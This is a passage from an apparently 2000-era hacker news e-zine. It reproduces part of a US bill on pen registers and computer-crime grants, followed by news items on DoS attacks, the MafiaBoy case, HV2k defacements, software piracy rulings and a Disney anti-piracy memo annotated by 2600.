device within the jurisdiction of the court, if the court
finds, based on the certification by the State law
enforcement or investigative officer, that the information
likely to be obtained by such installation and use is
relevant to an ongoing criminal investigation.''; and
(2) in subsection (b)--
(A) in paragraph (1)--
(i) in subparagraph (C), by inserting ``authorized under
subsection (a)(2)'' after ``in the case of a trap and trace
device''; and
(ii) in subparagraph (D), by striking ``and'' at the end;
(B) in paragraph (2), by striking the period at the end and
inserting ``; and''; and
(C) by adding at the end the following:
``(3) shall direct that the use of the pen register or trap
and trace device be conducted in such a way as to minimize
the recording or decoding of any electronic or other impulses
that are not related to the dialing and signaling information
utilized in processing by the service provider upon whom the
order is served.''.
SEC. 8. TECHNICAL AMENDMENTS TO PEN REGISTER AND TRAP AND
TRACE PROVISIONS.
(a) Issuance of an Order.--Section 3123 of title 18, United
States Code, is amended--
(1) by inserting ``or other facility'' after ``line'' each
place that term appears;
(2) by inserting ``or applied'' after ``attached'' each
place that term appears;
(3) in subsection (b)(1)(C), by inserting ``or other
identifier'' after ``the number''; and
(4) in subsection (d)(2), by striking ``who has been
ordered by the court'' and inserting ``who is obligated by
the order''.
(b) Definitions.--Section 3127 of title 18, United States
Code is amended--
(1) by striking paragraph (3) and inserting the following:
``(3) the term `pen register'--
``(A) means a device or process that records or decodes
electronic or other impulses that identify the telephone
numbers or electronic address dialed or otherwise transmitted
by an instrument or facility from which a wire or electronic
communication is transmitted and used for purposes of
identifying the destination or termination of such
communication by the service provider upon which the order is
served; and
``(B) does not include any device or process used by a
provider or customer of a wire or electronic communication
service for billing, or recording as an incident to billing,
for communications services provided by such provider or any
device or process by a provider or customer of a wire
communication service for cost accounting or other like
purposes in the ordinary course of its business;''; and
(2) in paragraph (4)--
(A) by inserting ``or process'' after ``means a device'';
(B) by inserting ``or other identifier'' after ``number'';
and
(C) by striking ``or device'' and inserting ``or other
facility''.
SEC. 9. PEN REGISTER AND TRAP AND TRACE REPORTS.
Section 3126 of title 18, United States Code, is amended by
inserting before the period at the end the following: ``,
which report shall include information concerning--
``(1) the period of interceptions authorized by the order,
and the number and duration of any extensions of the order;
``(2) the offense specified in the order or application, or
extension of an order;
``(3) the number of investigations involved;
``(4) the number and nature of the facilities affected; and
``(5) the identity, including district, of the applying
investigative or law enforcement agency making the
application and the person authorizing the order''.
SEC. 10. ENHANCED DENIAL OF SERVICE INVESTIGATIONS.
Section 2511(2)(c) of title 18, United States Code, is
amended to read as follows:
``(c)(i) It shall not be unlawful under this chapter for a
person acting under color of law to intercept a wire, oral,
or electronic communication, if such person is a party to the
communication or 1 of the parties to the communication has
given prior consent to such interception.
``(ii) It shall not be unlawful under this chapter for a
person acting under color of law to intercept a wire or
electronic communication, if--
``(I) the transmission of the wire or electronic
communication is causing harmful interference to a lawfully
operating computer system;
``(II) any person who is not a provider of service to the
public and who is authorized to use the facility from which
the wire or electronic communication is to be intercepted has
given prior consent to the interception; and
``(III) the interception is conducted only to the extent
necessary to identify the source of the harmful interference
described in subclause (I).''.
SEC. 11. ENCRYPTION REPORTING REQUIREMENTS.
Section 2519(2)(b) of title 18, United States Code, is
amended by striking ``and (iv)'' and inserting ``(iv) the
number of orders in which encryption was encountered and
whether such encryption prevented law enforcement from
obtaining the plain text of communications intercepted
pursuant to such order, and (v)''.
SEC. 12. STATE AND LOCAL COMPUTER CRIME ENFORCEMENT.
(a) In General.--Subject to the availability of amounts
provided in advance in appropriations Acts, the Assistant
Attorney General for the Office of Justice Programs of the
Department of Justice shall make a grant to each State, which
shall be used by the State, in conjunction with units of
local government, State and local courts, other States, or
combinations thereof, to--
(1) assist State and local law enforcement in enforcing
State and local criminal laws relating to computer crime;
(2) assist State and local law enforcement in educating the
public to prevent and identify computer crime;
(3) assist in educating and training State and local law
enforcement officers and prosecutors to conduct
investigations and forensic analyses of evidence and
prosecutions of computer crime;
(4) assist State and local law enforcement officers and
prosecutors in acquiring computer and other equipment to
conduct investigations and forensic analysis of evidence of
computer crimes; and
(5) facilitate and promote the sharing of Federal law
enforcement expertise and information about the
investigation, analysis, and prosecution of computer crimes
with State and local law enforcement officers and
prosecutors, including the use of multijurisdictional task
forces.
(b) Use of Grant Amounts.--Grants under this section may be
used to establish and develop programs to--
(1) assist State and local law enforcement agencies in
enforcing State and local criminal laws relating to computer
crime;
(2) assist State and local law enforcement agencies in
educating the public to prevent and identify computer crime;
(3) educate and train State and local law enforcement
officers and prosecutors to conduct investigations and
forensic analyses of evidence and prosecutions of computer
crime;
(4) assist State and local law enforcement officers and
prosecutors in acquiring computer and other equipment to
conduct investigations and forensic analysis of evidence of
computer crimes; and
(5) facilitate and promote the sharing of Federal law
enforcement expertise and information about the
investigation, analysis, and prosecution of computer crimes
with State and local law enforcement officers and
prosecutors, including the use of multijurisdictional task
forces.
(c) Assurances.--To be eligible to receive a grant under
this section, a State shall provide assurances to the
Attorney General that the State--
(1) has in effect laws that penalize computer crime, such
as penal laws prohibiting--
(A) fraudulent schemes executed by means of a computer
system or network;
(B) the unlawful damaging, destroying, altering, deleting,
removing of computer software, or data contained in a
computer, computer system, computer program, or computer
network; or
(C) the unlawful interference with the operation of or
denial of access to a computer, computer program, computer
system, or computer network;
(2) an assessment of the State and local resource needs,
including criminal justice resources being devoted to the
investigation and enforcement of computer crime laws; and
(3) a plan for coordinating the programs funded under this
section with other federally funded technical assistant and
training programs, including directly funded local programs
such as the Local Law Enforcement Block Grant program
(described under the heading ``Violent Crime Reduction
Programs, State and Local Law Enforcement Assistance'' of the
Departments of Commerce, Justice, and State, the Judiciary,
and Related Agencies Appropriations Act, 1998 (Public Law
105-119)).
(d) Matching Funds.--The Federal share of a grant received
under this section may not exceed 90 percent of the total
cost of a program or proposal funded under this section
unless the Attorney General waives, wholly or in part, the
requirements of this subsection.
(e) Authorization of Appropriations.--
(1) In general.--There is authorized to be appropriated to
carry out this section $25,000,000 for each of fiscal years
2000 through 2003.
(2) Limitations.--Of the amount made available to carry out
this section in any fiscal year not more than 3 percent may
be used by the Attorney General for salaries and
administrative expenses.
(3) Minimum amount.--Unless all eligible applications
submitted by any State or units of local government within a
State for a grant under this section have been funded, the
State, together with grantees within the State (other than
Indian tribes), shall be allocated in each fiscal year under
this section not less than 0.75 percent of the total amount
appropriated in the fiscal year for grants pursuant to this
section, except that the United States Virgin Islands,
American Samoa, Guam, and the Northern Mariana Islands each
shall be allocated 0.25 percent.
(f) Grants to Indian Tribes.--Notwithstanding any other
provision of this section, the Attorney General may use
amounts made available under this section to make grants to
Indian tribes for use in accordance with this section.
______
@HWA
93.0 [HNN] PSINet Hit with DoS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopalyse
A denial-of-service attack on PSINet Hong Kong on Wednesday disabled
the Internet service provider's Web-hosting servers for most of the
day, leaving many of its dotcom customers without e-mail and Web
sites. However, more than a day after the attack took place, the ISP
was still unable to determine whether it was the result of an outside
attacker or an internal blunder.
Technology Post
http://www.technologypost.com/internet/Daily/20000420194747504.asp?Section
Published on Thursday, April 20, 2000 INTERNET
PSINet hit by denial-of-service attack
NEIL ART
--------------------------------------------------------------------------
Updated at 8.55pm: A denial-of-service attack on PSINet Hong Kong
on Wednesday disabled the Internet service provider's Web-hosting servers
for most of the day, leaving many of its dotcom customers without e-mail
and Web sites. However, more than a day after the attack took place, the
ISP was still unable to determine whether it was the result of an outside
hacker or an internal blunder.
William Kwan, president PSINet Hong Kong, said "unusual amounts of traffic
were generated by a desktop computer through the network", which might
have been caused by a programmer checking data traffic.
A denial-of-service attack is one in which a large volume, or packets, of
information are continually sent to a network server, disrupting network
connectivity because the server is unable to answer the demand.
"We don't know what caused the large volume of traffic," Mr Kwan said,
adding that the company had not contacted the police.
The attack started around 1.45pm on Wednesday, PSINet said, adding that
its leased-line network was partially restored in two hours and fully
restored by 7pm.
However, PSINet's dial-up network was still experiencing problems as late
as midnight, according to some of its customers.
Clients said their e-mail services and Web sites were down for most of the
day.
Dennis Skouse, managing director Spin Design and Advertising, said he came
to work around 9.30am to find his e-mail box missing. His computer gave
him a message that it could not locate the server.
He said his company "absolutely relied" on e-mail to "send PDF [portable
document format] files all over the place for [client] approval".
Mr Skouse said that throughout the day he was sporadically able to access
and check his e-mail. He said it was bad timing because many people were
leaving Hong Kong for the Easter holiday and wanted to finalise designs
with his firm before doing so.
David Croasdale, business director Newell Public Relations, said the
company was off-line from mid-morning for most of the day.
"We rely a lot on e-mail to keep in touch with clients," he said. "Our
clients rely on Newell to get their messages out."
Newell founder Stuart Newell said: "The whole office felt completely out
of touch. Potentially, it could have a serious effect on business in Hong
Kong."
Advedi, a Web and e-mail services company, was also adversely affected, as
were many of its clients, said Patrick Ceulemans, co-founder and director
of Advedi.
"Basically, we are out of business as well as our clients," he said,
adding, however, that his company was able to re-establish service with
another ISP.
"It was down for at least two hours that I know of," said Mr Ceulemans.
"It is unfortunate, but this is life."
He said he had e-mailed PSINet, but it had not responded.
"There should be some system in place to notify clients, so that they in
turn may take appropriate action," said Mr Ceulemans.
PSINet declined to comment on the disruption to its services when
contacted on Wednesday night, but issued a brief statement on Thursday.
It said the disruption of service was due to PSINet's sharing of an
internal PC network with that of the customer network.
"Remedial actions have been taken immediately by relocating and
reconfiguring our internal network. We will do our utmost to minimise
similar problems from occurring in the future."
@HWA
94.0 [HNN] Satellite Jammer Plans on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Odin
With $7500 in spare parts and plans found on the Internet a US Air
Force team built what they say can successfully jam satellite signals.
Unfortunately they didn't give the effective range of the jamming
device or the URL to the plans.
New Scientist
http://www.newscientist.com/news/news_223528.html
( Shit, not found, anyone have this or any other details email me! - Ed)
@HWA
95.0 [HNN] GNIT Vulnerability Scanner Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by m0nk
The GNIT Vulnerability Scanner has been almost completely redesigned
from the ground up to perform a scan for open ports. Many new
functions have been added to this new release of GNIT, including the
great new feature of a custom generated HTML output after a scan has
been run. Only for Windows NT or 2000.
ellicit.org
http://security.ellicit.org
@HWA
96.0 [HNN] Free MafiaBoy
~~~~~~~~~~~~~~~~~~~
contributed by Bigfoot
Someone has set up a 'Free MafiaBoy' web site.
Free MafiaBoy
http://www.geocities.com/freemafiaboy/
@HWA
97.0 [HNN] MafiaBoy News Roundup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by ATKeiper and TwiLyght
While the saga of Elian Gonzalez played out in the popular media over
the weekend the tech reporters were busy trying to find a new angle on
the MafiaBoy arrest last week. MafiaBoy has been charged in Canada
with initiating a denial of service attack against CNN.
MafiaBoy's lawyer has said that they expect a long, complex and
technical trial. (Hopefully this means that he will not be pleading
out.)
Washington Post
Canadian police said on Saturday they had charged MafiaBoy's father
with conspiring with another man to commit assault. Evidence for the
charges was gathered by using the wiretaps originally placed to gather
evidence on the boy.
Reuters - via Go2net
The Free MafiaBoy web site has supposedly been threatened with a
lawsuit by the lawyers for relatives of Michael Lyle. Michael Lyle
claims to have had IRC conversations with MafiaBoy prior to his
arrest.
Free MafiaBoy
The Toronto Star ran a rather interesting political cartoon regarding
MafiaBoy yesterday.
The Toronto Star
http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html
http://www.go2net.com/headlines/general/20000422/186850.html
http://www.geocities.com/freemafiaboy/
http://www.thestar.com/thestar/back_issues/ED20000423/opinion/20000423NEW02x_ED-CARTOON.html
@HWA
98.0 [HNN] Members of HV2k Raided
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by at033
HV2k aka High Voltage 2000 appears to have been raided in relation to
several Canadian and US government defacements. SLiPY was raided in
late January by DND, NIS and the RCMP. The next day eg0death (Bleeding
Angel) was arrested by the US authorities in Texas. The current status
of eg0death, who was also in Global Hell, and SliPY is unclear at
this time. Someone calling themselves HV2k defaced the web server of
the US DHHS last Friday evening with a message "HV2k won't die". HV2K
is credited with defacing the same server on 11/2/99.
Ottawa Citizen - This article gives almost no information
Attrition.org - List of Over 50 Defacements Attributed to HV2k
http://www.ottawacitizen.com/hightech/000327/3825256.html
http://www.attrition.org/mirror/attrition/hV2ka.html
Cyber-mischief shows potential for damaging future attacks
Online terrorists, criminals likely to target vital infrastructure systems
David Pugliese
The Ottawa Citizen
His alias is hV2k and he's a hacker who specializes in breaking into
military and government computers.
HV2k is the Internet name of the person who entered the Department of
National Defence's Web page on Nov. 1. Within a period of five days, hV2k
-- also known as "slipy" -- broke into 19 military and government
computers in Canada and the United States. On his list were the state of
Virginia's Sex Offender Registry, the state of New York's tax computer
system, the Canadian government's Human Resources Development Department,
and four U.S. military computer sites.
A joint Canadian Forces National Investigation Service and RCMP
investigation determined the identity of two people involved in the hV2k
attacks, one of them being a young offender, but no further details are
being released.
But one thing is certain: The Canadian military expects hackers similar to
hV2k to come calling again.
"Canada is becoming more and more of a target for hacker-cracker groups as
information regarding domestic vulnerabilities becomes known," a Canadian
military intelligence report written in November concludes. Expect more
intrusions, was the report's basic message.
HV2k simply left his name on the military's Web site, but that action
required the department to individually check all its pages on the
Internet to see whether they had been altered. It's not known what was
done to the U.S. sites.
But security analysts and government officials are concerned there is
potential for much more than Web vandalism, especially when computers are
put into the hands of terrorists and criminals. A concentrated attack,
they worry, could shut down the key infrastructure computers that run
everything from the hydro system to telecommunications.
The result could be similar to the damage caused by the massive ice storm
that paralysed much of Eastern Canada in 1998.
"To me, it's the threat of the future which has to be watched more
closely," says Conservative Senator William Kelly, the chairman of the
Senate committee on terrorism and public safety. "A cyber-attack is a much
cheaper way to interfere with critical infrastructures than it is to drop
a nuclear bomb."
The other problem Canada faces is its close links with the U.S., both in
economic areas and its computer infrastructure. Any attack on the U.S. is
bound to cause a ripple effect into Canada.
"The U.S. has the highest level of technology, and therefore is the most
vulnerable to (information operations) attack by state (or) non-state
actors," warns another intelligence report compiled in November. "Canada's
connectivity with the U.S. also makes it highly vulnerable to (information
operations) attacks."
But terrorism expert John Thompson of the Mackenzie Institute in Toronto
sees the threat as overblown, at least for now. He says those who are
"attacking" government and military systems have been mainly hackers not
related to terrorist groups.
"No one has seen a terrorist yet who can do anything beyond hacking a Web
page up," Mr. Thompson points out. "It's more of a threat in potential
than one that has been realized."
The main problem for terrorist groups, he argues, is in finding competent
hackers. "Where is (Osama) bin Laden going to get his hackers?" asks Mr.
Thompson, referring to the alleged terrorist leader who is believed to
have ordered bombing attacks against U.S. embassies in Africa. "In
Afghanistan? I don't think so."
Mr. Kelly acknowledges that many attacks on Canadian computer systems can
be classified as more a nuisance than a threat. But he also points out
that some of the attacks, while appearing to be minor in nature, are
actually probes to test the weaknesses of the systems. That could be a
lead-up to more devastating assaults in the future.
In other cases, information has been removed or altered. For example,
Immigration Canada's computers have been hacked into by someone operating
from Asia and certain records were removed. "I consider that highly
dangerous," says Mr. Kelly.
Specialists in information warfare vary in their estimation of how
prepared Canada is for a cyber-attack. Col. Randy Alward, commander of the
Canadian Forces Information Operations Group, said the military itself has
a secure internal computer system. It also has a specialized team that
continually tests the security of its systems.
The Armed Forces is also developing a robust information protection
capability because it wants to branch out more on the Internet, using it
for everything from gathering information on military equipment purchases
to booking travel for employees. But to do that it has to make sure that
any future Internet connections are secure, so intruders can't use them to
slip into the internal computer system.
"We believe we are developing an information protection capability that is
fairly good," said Col. Alward. "We're quite comfortable with it, but it
is developing."
Other specialists, such as Prakash Bhartia, director general of Defence
Research Establishment Ottawa, where advanced work is being conducted into
hacker threats, worry that other federal government and commercial
computers are open to attack. "We are pretty vulnerable," acknowledges Mr.
Bhartia. So far, he said, Canada has escaped any real damaging attack.
His concern is borne out by intelligence reports. "The vulnerabilities of
Canadian critical infrastructure are increasing and recent trends show
more attacks aimed at infrastructures," the November report warns.
But Mr. Kelly believes the country is on the right track in preparing for
future cyber attacks. He says a lot of progress has been made in both
provincial and federal government areas in setting up a system to share
information on attacks and determining where the vulnerabilities lie. He
believes Canada is ahead of the U.S. in the area of protecting its
infrastructure computers and that a national centre to co-ordinate a
response to cyber attacks will soon be developed by the government.
"One of the problems we've had all along is the relative lack of concern
Canadians have always had about their own security," said Mr. Kelly. "But
I think people are gradually becoming more aware of what the risks are."
Those risks, according to the Canadian military intelligence reports,
could come in the form of hackers for hire, both for criminal and
terrorist groups. "Many hackers or crackers, including former employees of
Eastern Bloc intelligence services, now work on the open market and
provide their services to state/non-state actors," one report determined.
"Clients include business intelligence firms engaged in industrial
espionage as well as criminal organizations intent on outwitting police
surveillance or perpetrating electronic frauds."
It points out that the Colombian drug cartel, for instance, has set up a
communications system that is difficult for police and western
intelligence agencies to break into.
Other groups are operating for more political motives. One such
organization, the Hong Kong Blondes, claims to be based in China and is
directed by two individuals by the names of Blondie Wong and Lemon LI. An
offshoot of that group has been created and dubbed the Yellow Pages. It
has threatened to attack the information infrastructure systems in China
and the U.S., with the goal of increasing international awareness of human
rights abuses in China.
"It seems (the Hong Kong Blondes) was created to demand accountability
from western companies that conduct business with (Chinese) organizations
who are responsible for the continuing abuses of human rights," one
intelligence report noted. The Hong Kong Blondes, it pointed out, are
ready to conduct computer attacks on western companies dealing with China.
@HWA
99.0 [HNN] Piracy Legal In Italy, Sort of
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by TheHex
A judge in Turin has ruled that the copying of commercial software is
not a crime as long as it is not done for profit or sold to third
parties. The case centered around a Turin businessman who made copies
of software for use in his company. The judge ruled that since the
businessman did not copy the software for profit he is not guilty of
a criminal violation. Microsoft said it was disgusted with the ruling.
Wired
http://www.wired.com/news/politics/0,1283,35827,00.html
Italy: Software Piracy OK, Sorta
Reuters
8:00 a.m. Apr. 21, 2000 PDT
MILAN -- A judge in Turin has ruled that it is not a crime to copy
software as long as it is not done for profit and the pirated copies are
not sold to third parties, Italian newspapers reported on Friday.
Corriere della Sera and other papers reported the case of a Turin
businessman who made copies of word-processing, accounting, and design
software for use in his company.
But even though he saved money by paying only one license fee, the judge
ruled that since he had not sold on the copied software to others, he did
not act "for profit."
Defense lawyer Claudio Morro told Corriere that the ruling was in line
with the law, which specifically said that for criminal rather than civil
charges to be brought, the motive for copying the software had to be
profit.
"My client copied the programs not to sell them to others but only to use
them within his company. So in his case there is only the saving on
spending," Morro was quoted as saying.
"There could still be elements for a civil case, but from a criminal point
of view the question is resolved."
A Microsoft Italia executive told the paper the company was disgusted by
the ruling.
"It is clearly the fault of a legislative hole, but also of an excessively
technical attitude on the part of the judge who passed the sentence. The
judge has made a mistake," Maurizio Bendina, director of Microsoft
Italia's small business division, was quoted as saying.
Copyright © 1999-2000 Reuters Limited.
@HWA
100.0 [HNN] Palm VII Considered Security Threat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by William Knowles
The Lawrence Livermore National Laboratory has banned the Palm VII
from its labs due to its potential as a security threat. Lab officials
say that they are complying with DOE directives that prohibit devices
that can transmit information over radio waves. Officials are afraid
that saboteurs may use the PalmVII to transmit classified information
outside the lab perimeter.
San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/merc/docs/001887.htm
Deceased url
@HWA
101.0 [HNN] Navy Intranet National Security Risk?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by William Knowles
The American Federation of Government Employees (AFGE) has charged
that the Navy's proposed $10 billion, 360,000 seat intranet is a threat
to national security. AFGE says that the Navy has not thoroughly
thought out its plan and that awarding the entire contract to one
company places a considerable security risk on the proposed Intranet.
The Navy claims that the AFGE simply does not understand the
complexity of the situation.
Wired
http://www.wired.com/news/politics/0,1283,35713,00.html
Navy Intranet a Security Threat?
by Craig Bicknell
3:00 a.m. Apr. 21, 2000 PDT
The U.S. Navy's plan to build the world's biggest Intranet could
create a big security threat and a boondoggle to boot, according to the
country's largest federal employees union.
"We're concerned about national security, because the Navy's not able to
answer basic questions about how they will protect national security on
(the new Intranet), and we're concerned that they're playing a shell game
with money," said Brendan Danaher, policy analyst for the 600,000
member-plus American Federation of Government Employees (AFGE).
The union's barrage is the latest attack on the Navy's proposal to build a
gargantuan, 360,000-seat Intranet that would unify all of the Navy and
Marine Corps' shore-based operations. The Navy plans to award the $10
billion contract for the project to one of four corporate bidders this
June -- nine months earlier than originally planned -- reflecting the
sea-service's urgency to reap the benefits of modern info-tech.
Last month, the United States General Accounting Office testified before
Congress that the Navy had rushed the proposal to corporate bidders
without properly analyzing how it would be funded and managed, and what
effect it would have on military and civilian information technology
workers.
Since then, embattled Navy representatives have appeared before Congress
53 times to defend their plan.
"There's been absolutely no one who questions the need, value, or concept
of this Intranet," Navy deputy CIO Ron Turner said. "They just don't
understand the math we've put into this."
But there's more than a math problem, insists AFGE's Danaher. The Navy's
plan to contract out the installation, service, and oversight of the
Intranet to a single private company poses an unacceptable national
security risk, he said.
"We're concerned that private companies will put their interest before
national security," Danaher said. "What if that company's ownership
changes, or its stock price plummets. Who knows what could happen?"
That argument lacks a certain sophistication, according to Turner.
"It's a comment made without looking at how we currently operate. The
government would like you to believe that we control the networks, but we
ride on commercial fiber that someone else operates," he said.
Moreover, the Navy currently operates 100-plus separate networks, all with
different firewalls and security, all of which have to interconnect. That
means 100 points of vulnerability, according to Turner. With a unified
Intranet, the Navy can deploy one security system and screw it down tight.
Security will be improved, not degraded, he insists. There's no
budget problem either, Turner said. Funds for the Intranet will come from
money already allocated for IT projects, not from the operational coffers
that pay for ships to sail and planes to fly, as critics in Congress have
charged.
Turner attributes the AFGE's attack largely to a self-serving desire to
protect union IT jobs that might be threatened by the new Intranet. Some
1,000 civilian IT employees could be displaced by the Intranet, he said,
but the Navy will take pains to place them in new positions.
Danaher counters that it's not the threat of job losses that concerns the
AFGE so much as the Navy's inability to say exactly what jobs might be
lost where, and what that says about the broader project. "We don't know,
the Navy doesn't know, nobody knows, and that's a symptom of a larger
problem," Danaher said.
"Our members are people that work for the military and the federal
government, and they're concerned about national security and efficiency,"
he said. "When you look at the history, you see that the Navy is anything
but trustworthy when it comes to contract oversight. We're not saying this
is a horrible idea, but the way they're going about this is pretty
dangerous."
The government's accounting office and a number of congressmen share those
concerns.
"Look, we're not trying to pull the wool over people's eyes," said a weary
Turner, who expects to appear before Congress several times in the coming
weeks to further detail the Navy's proposal.
Meanwhile, barring any direct orders to the contrary, the project will
continue full-speed ahead.
"Nobody's told us to stop or slow down," Turner said.
@HWA
102.0 [HNN] Mitnick Upset Over Claims Made by UITA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by Mitnick_Media
In a press release linked to by HNN last Thursday the Utah Information
Technology Group made several claims that Kevin Mitnick feels are in
error. In an effort to set the record straight we provide both sides
of the story.
HNN Archive for April 2, 2000
Deseret News
Mitnick Rebuttal
http://www.hackernews.com/arch.html?042000#2
http://deseretnews.com/dn/view/0,1249,160008642,00.html?
Already printed elsewhere this issue - Ed
@HWA
103.0 [HNN] Holiday Message from Disney Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by Macki
2600 magazine was recently furnished with a copy of an email sent from
Walt Disney CEO, Michael Eisner, to a vast number of Disney employees
about DVD piracy.
2600
http://www.2600.com/news/2000/0423.html
A HOLIDAY MESSAGE FROM DISNEY CHIEF 04/23/00
2600 was recently furnished with a copy of an email sent from Walt Disney
CEO, Michael Eisner, to a vast number of Disney employees. While 2600 is
not mentioned by name, the letter clearly focuses on the issues raised by
the lawsuit Disney (and other MPAA members) have filed against us for
publishing DeCSS on our website. In one paragraph towards the end of the
letter Eisner actually makes our case for us and admits that either DVDs
are too expensive and people pirate them, or they are affordable (which
they are) and people don't pirate them (which they don't).
Our comments are in bold.
Dear Fellow Cast Members:
In several past e-mails, I have written you about the tremendous
opportunities represented by the Internet. Today, I offer a caveat. While
the Internet continues to present great potential to our company, we
first must fully address the issue of piracy.
For some reason piracy has been on my mind. Maybe this is because I keep
reading about the seriousness of it, or maybe it is because I know a
digital copy of a film is a perfect copy. Or maybe it is because I know
that the Internet is a worldwide delivery system honoring no borders. Or
maybe it is because I just needed something to speak about at the
Variety/Schroeder's entertainment industry conference in New York City 10
days ago. Probably it is a little of all the above.
[A digital copy transferred over the Internet is likely to be compressed
and far poorer quality than an analog copy.]
By "piracy," I'm not talking about the comical characters sailing the high
seas at the Pirates of the Caribbean. Rather, I'm talking about an
underground of secretive and sequestered pirates of encryption - the
hackers who shamelessly assert that anything they can get their hands on
is legally theirs. These Internet pirates try to hide behind some
contrived New Age arguments of the Internet, but all they are really doing
is trying to make a case for Age Old thievery.
[Wow that's pretty twisted. "pirates of encryption", who the hell are
they? How does one pirate encryption? More so, what does that possibly
have to do with people stealing? On top of all that, now 'hackers' is
supposed to be synonymous with 'shameless thieving pirates of encryption'?
Someone here is shameless, and it ain't us. "When they hack a DVD and then
distribute it on the web", yet another jump is made from breaking
encryption to PLAY DVDs to distributing it on the web. Funny how they
haven't accused ANYONE of doing this. Nor would it make any sense for
someone to "hack a DVD" before ripping it as a VCD - since VCDs are
usually lower resolution than television.]
When they hack a DVD and then distribute it on the web, it is no different
than if someone puts a quarter in a newspaper machine and then takes out
all the papers, which, of course, would be illegal and morally wrong. The
pirates will argue that this analogy is unfair, maintaining that all
they're doing is cracking a digital code. But, by that standard, it would
be justifiable to crack a bank code and transfer the funds from someone
else's account into your own. There's just no way around it - theft is
theft, whether it is enabled by a handgun or a computer keyboard.
[Of course pirates will argue that analogy is unfair - so would anyone
with any modicum of critical thinking skills. While we could argue the
difference between intellectual property and tangibles like a newspaper,
this analogy is irrelevant because no piracy is actually taking place.
Normally we wouldn't even feel the need to respond to this, but since he
goes on to imply that WE are the "pirates" it seems like a good idea.
Eisner speculates that people will maintain that all that was done was the
"breaking of the digital code" - he's right. Note that breaking CSS does
not involve any stealing or piracy. So then it does not logically follow
that by breaking the code someone is also necessarily using it to steal.
After all, CSS prevents DVDs from being PLAYED not COPIED, so cracking it
is in no way an indication of impending theft.]
Of course, piracy has been around a long time. Many of you probably
remember a very funny "Seinfeld" episode (I suppose that's redundant -
they all were funny, except maybe for the last one) in which Jerry becomes
an "auteur" at making illegal copies of movies by videotaping them off the
screen at the local multiplex. But, piracy is anything but funny ...
especially now that, instead of making one bad quality videotape for sale
on the street, these digital pirates could soon be making unlimited
numbers of high quality copies available on the Internet.
One of the fallacies of the piracy debate is that it's really just a
conflict of the pro-technology members of the "New Media" against the
anti-technology members of the "Old Media." This characterization couldn't
be more wrong. At Disney we embrace technology. And we always have.
Throughout his career, Walt Disney recognized new technology as the friend
of the storyteller. And, at Disney today, we are not only seizing the
tremendous possibilities offered by technology in movies, as with
"Dinosaur" and "Toy Story," but we are also active participants in the
expansion of the Internet with our GO.com family of sites. We intend to
continue to devote resources to the Internet ... but not if this requires
surrendering the rights to things we own. With this in mind, our company
is undertaking a wide-ranging strategy to make the Internet truly safe for
intellectual property. This strategy consists of five main elements.
First of all, we are turning to our representatives in Washington.
Intellectual property rights are really no different from ordinary
property rights. If you own something, you expect the government to
respect your right to keep it from being stolen.
[Ah good, since legislating security away worked so well the first time!]
Secondly, we are working with governments around the world to respect our
rights. We are actively involved in the Global Business Dialogue on
Electronic Commerce, and our company is serving as chair of the
Intellectual Property Work Group.
The third element is education. Working with The Motion Picture
Association of America, we are advocating a more aggressive campaign to
make people aware of intellectual property rights on the Internet. Most
people are honest and want to do the right thing. But they can't do the
right thing if they don't know that they're doing a wrong thing.
[Perhaps they should consider gaining a tighter grasp on reality
themselves, before being so presumptuous as to educate others on the
Internet.]
Fourth, we believe that the entertainment industry as a whole should take
meaningful technological measures. Working in cooperation with technology
companies, we need to develop innovative and flexible encryption devices
that can stay one step ahead of the hackers.
[How about just doing it right the first time? Or better yet, stop
infringing on the Fair Use Doctrine, so that people won't NEED to break
the encryption!]
Our fifth initiative is economic. History has shown that one of the best
deterrents to pirated product is providing legitimate product at
appropriate prices. In the music industry, we have already seen that
people will gladly pay fair prices for legally-produced product even when
it can be easily reproduced and unlawful copies can be easily acquired.
[This is the best paragraph in the whole damn thing. Michael Eisner is
actually admitting that either DVD prices are too high (like in the UK) or
that piracy is not a problem because people will buy DVDs anyway - just
like they do CDs. He is absolutely correct, we have been saying this all
along. It is cheaper to BUY a DVD than it is to pirate it, and you get a
nice clean copy complete with goodies. Finally, the truth comes out:
PIRACY IS NOT THE ISSUE! Being able to PLAY legally purchased DVDs in the
player and country of your choice are the issues! We're so glad Michael
Eisner has finally admitted this - maybe now Disney will drop the
lawsuit.]
With every passing day, I believe we are getting closer to a time when the
Internet will become another important revenue stream for the studios.
This is what happened with Pay TV in the '70s and with Home Video in the
'80s. If we act appropriately and aggressively in combating the pirates,
then this could be the dawn of a new era of opportunity for companies that
consistently create great entertainment ... and there's one in particular
that comes to mind.
So that's what has been on my mind the last couple of weeks, that as well
as the strong showing of our company, especially at our parks and TV
networks. Life is good. Have a nice Easter/Passover Weekend.
[Lashanah haba'ah b'Federal Court, Mikey]
Michael
@HWA
104.0 [HNN] Attrition Updates Mailing List
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by McIntyre
Attrition.org has modified their mailing list section to let readers
know that even though the main mirror isn't updated on a continual
basis, their automated mirror script e-mails the "defaced" lists by
default immediately after each mirror is taken along with a URL for
the mirror's location. Readers interested in more "instant
notification" should sign up today.
Attrition.org
http://www.attrition.org/security/lists.html
@HWA
105.0 [HNN] MafiaBoy's Friends Under Investigation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by Evil Wench
Authorities have identified three friends of MafiaBoy who are also
suspects in the recent DDoS attacks. Authorities are also
investigating a small group thought to be based in Israel who have
been involved in various online financial crimes in the past. They
